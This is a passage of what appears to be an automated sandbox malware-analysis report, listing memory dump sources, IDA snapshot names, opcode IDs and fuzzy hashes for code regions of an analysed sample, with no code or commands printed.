                                                                                                                    • Opcode Fuzzy Hash: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction Fuzzy Hash: 41C04C3052580D8FCA54FB7DC98595476A0FB0D215BD60190E40DC7171E69A9D95D741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bac0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction ID: f9bd5b7c055a8adc5226548f1e553392da6241cdc07abab4a0ce757127c62410
                                                                                                                    • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction Fuzzy Hash: C3C08C3051180C8FC908FB28C88582833A0FB09300BC20090E008C7174D259DCC0C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bac0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction ID: db7d7326a4ed3d64de75acb640173bc13af19e40b23d4564a226e3b22930fddb
                                                                                                                    • Opcode Fuzzy Hash: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction Fuzzy Hash: 4DB01200D5740F00E83433FA085607970405B44100FD20170D80C81091D8CE12D4034A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5X_H
                                                                                                                    • API String ID: 0-3241812158
                                                                                                                    • Opcode ID: 95cea4b74ae056f13f2cf26375668cec88053a9ceac84d9751aca05bb8a1bd3f
                                                                                                                    • Instruction ID: c291c9265868e7f16f5360302bd9531eac3e2b412b478f3e8681406d7bdb5cba
                                                                                                                    • Opcode Fuzzy Hash: 95cea4b74ae056f13f2cf26375668cec88053a9ceac84d9751aca05bb8a1bd3f
                                                                                                                    • Instruction Fuzzy Hash: C9911771A19A8D4FE7A9CB6888757A97FE1FF9A314F0102BED049DB2E6CBB41410C740
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9
                                                                                                                    • API String ID: 0-3426396564
                                                                                                                    • Opcode ID: 96252a40cb3aacf3fcb1159b6c8f151d757a3001cffa47f232aad157bc0557ee
                                                                                                                    • Instruction ID: f0fdb50e32e9878887a471620b594e46ad2069f1575295a95b9bf15a8b31c0e0
                                                                                                                    • Opcode Fuzzy Hash: 96252a40cb3aacf3fcb1159b6c8f151d757a3001cffa47f232aad157bc0557ee
                                                                                                                    • Instruction Fuzzy Hash: 6B01282772995A4BC702ABBEFC610F87B40EBD717679602B7D044C71A2E251145FC3D1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 82059143178b92bb67ae4dfd0fd62c8925496c729ad133a76ea9db1e2532a7bb
                                                                                                                    • Instruction ID: 0121c2bbcc03262729e92916677ffc48fe2771848c6e39adce62a86dff1fdd59
                                                                                                                    • Opcode Fuzzy Hash: 82059143178b92bb67ae4dfd0fd62c8925496c729ad133a76ea9db1e2532a7bb
                                                                                                                    • Instruction Fuzzy Hash: 8F413B12B0C5590AD724F7BC64A66F97780EF9933AB0806FFE44ECB1EBCD146841C285
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: eba9d3b8e9c1d990d6e2afd665a4ace5e74b0aa6f197ff636fa3632ee19908a3
                                                                                                                    • Instruction ID: effed736ab88d10123e117f4ffd4dd9f1c5f4c2db4aba59fb70c21ae6f1a0810
                                                                                                                    • Opcode Fuzzy Hash: eba9d3b8e9c1d990d6e2afd665a4ace5e74b0aa6f197ff636fa3632ee19908a3
                                                                                                                    • Instruction Fuzzy Hash: A631E421B1D90D0FE758B76C98AA67A76C2EF9D320F4506B9E40DC32E7DD68AC418281
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1611bddb715690b9cd4adee9738cf519f048c334eca9c0f68daf15a2d6150a68
                                                                                                                    • Instruction ID: cdeeef03d73466080b7e03cba0b7d86356ed7cdd4f1c41cefc65d4c3fc97858c
                                                                                                                    • Opcode Fuzzy Hash: 1611bddb715690b9cd4adee9738cf519f048c334eca9c0f68daf15a2d6150a68
                                                                                                                    • Instruction Fuzzy Hash: 3A31D731A0D68E8FDB56EB64C8649AD7FF0EF66300B0902FFD009D71A3DA68A944C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f50893b460aae007271bf64d7389f599cf8be859d38df624bc873158c6567ead
                                                                                                                    • Instruction ID: 5de7e30c387208da8e6edb502d8e939be3be0196d6d75268b7b37d9838c48254
                                                                                                                    • Opcode Fuzzy Hash: f50893b460aae007271bf64d7389f599cf8be859d38df624bc873158c6567ead
                                                                                                                    • Instruction Fuzzy Hash: 5A213021F1950D4AEBB4E79884786BC62A1FFD8300F5243B9D44ED32B6EE786A418B04
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cb373c46765eb5ae1f337ed8bcbc2b0ce7df66b28a046055ab48d2d6d7af50de
                                                                                                                    • Instruction ID: 16b152284ffa9bf27fca04feea333cff0164a2480dd8b363dbe4f97b0cd81797
                                                                                                                    • Opcode Fuzzy Hash: cb373c46765eb5ae1f337ed8bcbc2b0ce7df66b28a046055ab48d2d6d7af50de
                                                                                                                    • Instruction Fuzzy Hash: B2210435B0E68D8FE332DBA888251DC7FB0EF82325F5642B7C0448B1E2D578164AC745
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e579596a7631817bde03f6845c794021f50eceb478e698f894a57273b91a72f4
                                                                                                                    • Instruction ID: a284560212f0542c328aca13d142ce443bb302da1f673b69e7390406ac37553d
                                                                                                                    • Opcode Fuzzy Hash: e579596a7631817bde03f6845c794021f50eceb478e698f894a57273b91a72f4
                                                                                                                    • Instruction Fuzzy Hash: 0E11E031A0E68C8FE722DBA888612DC7FB0EF82311F4646B7C084CB1A2D5741609C781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb3c139564bbb21169037030bddfe281cfe839f217f0397df28813537585095f
                                                                                                                    • Instruction ID: cd5e65c90256c80b854d8e389a26fb5238debba71924ec35a68f740cdd1a0e38
                                                                                                                    • Opcode Fuzzy Hash: bb3c139564bbb21169037030bddfe281cfe839f217f0397df28813537585095f
                                                                                                                    • Instruction Fuzzy Hash: 9901C431A0E78C8FE722DB68C8652DD7FB0EF82315F5646E7C084DB1A2D5745648C781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 66d76f297a0720b72ef67566d1a09a95c39f8faa7cfae725924a7045a15a4cb7
                                                                                                                    • Instruction ID: b58b725e91e148f5b2a7fdaaaa801576f1e8ff5bce033b2c3176252ab488234a
                                                                                                                    • Opcode Fuzzy Hash: 66d76f297a0720b72ef67566d1a09a95c39f8faa7cfae725924a7045a15a4cb7
                                                                                                                    • Instruction Fuzzy Hash: D4014431A599188FCB59DB48C8A49E9B3F1FB98310F15426DD04ED32A1CB34AA41CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction ID: 33b7d2c5dd46e8a3073e0c5bb6d4a46d134e9b3685107eff6423653fe3cdf18b
                                                                                                                    • Opcode Fuzzy Hash: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction Fuzzy Hash: 68F03131A4D50E4AEB74EB94D4646EC33A1FBD4310F22427DD40ED32B6DDB86A818A04
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 158fe690741e9b262f9e87304593b1abe3f765ad36320972d46563ec4e484d9e
                                                                                                                    • Instruction ID: 9d6cb40344f499d0602e600beb3648148a500c0a09d485a119545bd7136689ab
                                                                                                                    • Opcode Fuzzy Hash: 158fe690741e9b262f9e87304593b1abe3f765ad36320972d46563ec4e484d9e
                                                                                                                    • Instruction Fuzzy Hash: E7F0AB31209A498FCB42EB3CDCA50E43B10EF4320879B16FBC088C7072C210055AC700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d60aeb95977bd63745a81884a2dd8b03dc2d17adcaae3576decc2132878572e7
                                                                                                                    • Instruction ID: 3538dba391c23bccf7ac028c69a20ea851fa4d1ed598b324f0bead5332598722
                                                                                                                    • Opcode Fuzzy Hash: d60aeb95977bd63745a81884a2dd8b03dc2d17adcaae3576decc2132878572e7
                                                                                                                    • Instruction Fuzzy Hash: B901A230A0E3CC8FE722DBA488642DDBFF0AF42314F5542E7C484CB1A2DA785648C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 139a9c564406fe8d95a81ce687f8d159631e2ba815473299c77cc1a7da7fe0d9
                                                                                                                    • Instruction ID: 1848593244319786c7484619379577300bc5f2530f9a3bc11c604b3306c71396
                                                                                                                    • Opcode Fuzzy Hash: 139a9c564406fe8d95a81ce687f8d159631e2ba815473299c77cc1a7da7fe0d9
                                                                                                                    • Instruction Fuzzy Hash: D2E01A0AF5F51F02E57533E968760EC76108FC4A24FD60372E40C880E6ACCE2685826A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction ID: 2120eca5c3a28b7676e168761084c0c98b940c8628ff2c181b9ccc8dad37705e
                                                                                                                    • Opcode Fuzzy Hash: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction Fuzzy Hash: F7E06D70F0B50E4EF370A7A0C425BA9A2A0AF90300F0546B9D50E961A2CDF869808B89
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 329141e2bf43298c0bfac1ccf9e39dadef2731d9ca7cf5e060932369513e2a5c
                                                                                                                    • Instruction ID: f0cac1715a388248019fcdc27b225aac9cd10a195bfc25390174b30b057bf75e
                                                                                                                    • Opcode Fuzzy Hash: 329141e2bf43298c0bfac1ccf9e39dadef2731d9ca7cf5e060932369513e2a5c
                                                                                                                    • Instruction Fuzzy Hash: E1D0A705F5D45A57E37AE36408218BE08870FD5328F090334F01EC92E9EE9C1A0152C3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction ID: 772dbf9ebf4f934dde63cfa1c47e19edf8b5ba30cc8e6c4321266584497f1eed
                                                                                                                    • Opcode Fuzzy Hash: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction Fuzzy Hash: DAC08C3052180C8FC904EB3CC88490032A0FB0D214BC20190E00DC7170E29A9C80C700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction ID: b973e47480f416ec2620f1f3931be3ed377a92be5e1d2adbe71f1e988c853338
                                                                                                                    • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction Fuzzy Hash: BBC08C3051180C8FC908EB28C88490833A0FB09300BC20090E008C7170D259DDC0C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001D.00000002.2718637246.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_29_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction ID: a8c984677ea6bffaa03a76e880fb1c141bd80cefdb43eabde135ac57406eaf4c
                                                                                                                    • Opcode Fuzzy Hash: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction Fuzzy Hash: 61B01200D5740F01E43433FA086A06970409BC4100FC20270D40C80091D8CD12D4034A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9c52e49e93ea8b5adb86d83be545b56632f91ec5ae1533d835842f13b443e7a9
                                                                                                                    • Instruction ID: 8359d0691d00b076f7a98d49f9d045cca2feef779abfab3331ea749b316b60f4
                                                                                                                    • Opcode Fuzzy Hash: 9c52e49e93ea8b5adb86d83be545b56632f91ec5ae1533d835842f13b443e7a9
                                                                                                                    • Instruction Fuzzy Hash: C2C2C731B1991E4FEBA8EB58C8A16B87392FFA8310F1546B9D01DC32D6DE74BD418780
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5Y_H
                                                                                                                    • API String ID: 0-3237497481
                                                                                                                    • Opcode ID: 7ad16265ab1a01e81b3a7a139be1192928b264880fdbe89a20acca0a330959ea
                                                                                                                    • Instruction ID: b9b9551bd8c23bc8284a0f9a560e2215b7bf237d98de971ef7ad85a90c60f47b
                                                                                                                    • Opcode Fuzzy Hash: 7ad16265ab1a01e81b3a7a139be1192928b264880fdbe89a20acca0a330959ea
                                                                                                                    • Instruction Fuzzy Hash: A3910476A19A8D8FE799DB68C8657B87FE1FF5A314F0101BAD059D73E2CAB42410C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 180456a37099ef4601c446668fda0cdc5bb42e65dd0e009c46ddb5d6d9fd04dd
                                                                                                                    • Instruction ID: c42e15bce0a7dfab9e4cd9f5141bd48a4631b0191ac93d3e183c9e36794d0a14
                                                                                                                    • Opcode Fuzzy Hash: 180456a37099ef4601c446668fda0cdc5bb42e65dd0e009c46ddb5d6d9fd04dd
                                                                                                                    • Instruction Fuzzy Hash: A062A531B1DA1E4FEBA8EB58C8A16B47392FFA8350F1542B9D01DC72D6DE74AD428740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 67a5596e879497fe3915abfe6ddbe6d159d778761d535854b94cf20dfd28c368
                                                                                                                    • Instruction ID: 37d05dcf28c3c371e18b351c0eedf8ee8c1e5ab401172f9804e490077d3e5262
                                                                                                                    • Opcode Fuzzy Hash: 67a5596e879497fe3915abfe6ddbe6d159d778761d535854b94cf20dfd28c368
                                                                                                                    • Instruction Fuzzy Hash: 08C19A20B1F79A0AE33D5A6848624F17B91EF92615B1A83BDC8DBC7097D868760783C5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9
                                                                                                                    • API String ID: 0-3426396564
                                                                                                                    • Opcode ID: 1332c719c76affe887704e93c0b8f7a3fcdb380ca1128a8470250fa08ca4048e
                                                                                                                    • Instruction ID: 9ec78bfb1d555c3c4c2e629127fbce79dfef656486633dc04b785726e2ef7695
                                                                                                                    • Opcode Fuzzy Hash: 1332c719c76affe887704e93c0b8f7a3fcdb380ca1128a8470250fa08ca4048e
                                                                                                                    • Instruction Fuzzy Hash: 6F01D12772A95E8BD641AB7EF8500F8BB40EAD7136B9603F7D044C71A2E551285AC3D0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: c7c5cf8004e59fb520d06a6347ab8f550ef73a922c6764a689015c0a4f7a5274
                                                                                                                    • Instruction ID: 7c7e3fe5fe840c6beee7f75f3c708aad4877dd5d01b886b77be12c4fbca549c3
                                                                                                                    • Opcode Fuzzy Hash: c7c5cf8004e59fb520d06a6347ab8f550ef73a922c6764a689015c0a4f7a5274
                                                                                                                    • Instruction Fuzzy Hash: FCF0C271A0F3C54FCB26A7794829455BF60EE2721178A45FEC086CF1B3E96D888AC701
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 363512d6012de8f5d14b9cbb054f1e3c9d428e5600f169cdbad5c7567597b232
                                                                                                                    • Instruction ID: ffeeee892d929306c8fd502d9a5c907819b4fa321389c08a6bc81366d807c089
                                                                                                                    • Opcode Fuzzy Hash: 363512d6012de8f5d14b9cbb054f1e3c9d428e5600f169cdbad5c7567597b232
                                                                                                                    • Instruction Fuzzy Hash: A4E0656160E7C44FC716E735886D455BFA0EF6721174A41EFC445CF1A7DA1DC885C711
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 6dd8f625966fcb3ff15a50463ebbf9ef6c6a6fba0ff2d37a7e59b1081642bab3
                                                                                                                    • Instruction ID: d4962cf6f2fa005dc551cc22f6fdec3fff525516b7be410d01324e12fa6c595d
                                                                                                                    • Opcode Fuzzy Hash: 6dd8f625966fcb3ff15a50463ebbf9ef6c6a6fba0ff2d37a7e59b1081642bab3
                                                                                                                    • Instruction Fuzzy Hash: E4E09271A0E7C44FCB16EB388869454BFA0EF6731174A42EEC086CF1A3EA2DC885C701
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: c80cc55de5fc7e802b9f6503c4b61398171c10264d3b763b005b8737deba6824
                                                                                                                    • Instruction ID: 415c3151f4ef8032bebabac26f204fda3f8a6e1f4024152e09e0f8c7e6de2509
                                                                                                                    • Opcode Fuzzy Hash: c80cc55de5fc7e802b9f6503c4b61398171c10264d3b763b005b8737deba6824
                                                                                                                    • Instruction Fuzzy Hash: FBE06D71A0E7C44FD71AAA348869455BFA0EF6720174A42EFC045CF1A3EA2DC889C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
